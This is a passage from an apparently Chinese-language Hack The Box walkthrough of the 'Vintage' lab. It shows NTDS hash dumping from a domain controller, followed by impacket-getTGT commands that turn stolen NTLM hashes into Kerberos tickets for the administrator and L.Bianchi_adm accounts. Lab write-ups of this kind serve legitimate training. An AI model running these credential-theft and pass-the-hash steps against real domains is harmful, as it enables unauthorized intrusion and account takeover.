SMB dc01.vintage.htb 445 dc01 [+] Dumped 17 NTDS hashes to /root/.nxc/logs/ntds/dc01.vintage.htb_None_2025-08-05_130319.ntds of which 14 were added to the database
SMB dc01.vintage.htb 445 dc01 [*] To extract only enabled accounts from the output file, run the following command:
SMB dc01.vintage.htb 445 dc01 [*] cat /root/.nxc/logs/ntds/dc01.vintage.htb_None_2025-08-05_130319.ntds | grep -iv disabled | cut -d ':' -f1
SMB dc01.vintage.htb 445 dc01 [*] grep -iv disabled /root/.nxc/logs/ntds/dc01.vintage.htb_None_2025-08-05_130319.ntds | cut -d ':' -f1
然后请求一个域管的票据
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# impacket-getTGT 'vintage.htb/administrator' -dc-ip 10.10.11.45 -hashes :468c7497513f8243b59980f2240a10de
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache
在winrm连上去即可
失败了,用nxc验证一下
管理员被限制登录了。
换 L.BIANCHI_ADM 用户登录即可
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# impacket-getTGT 'vintage.htb/L.Bianchi_adm' -dc-ip 10.10.11.45 -hashes :c09c04633d6d0a90d3ee2fd020be433a
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in L.Bianchi_adm.ccache
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# export KRB5CCNAME=L.Bianchi_adm.ccache
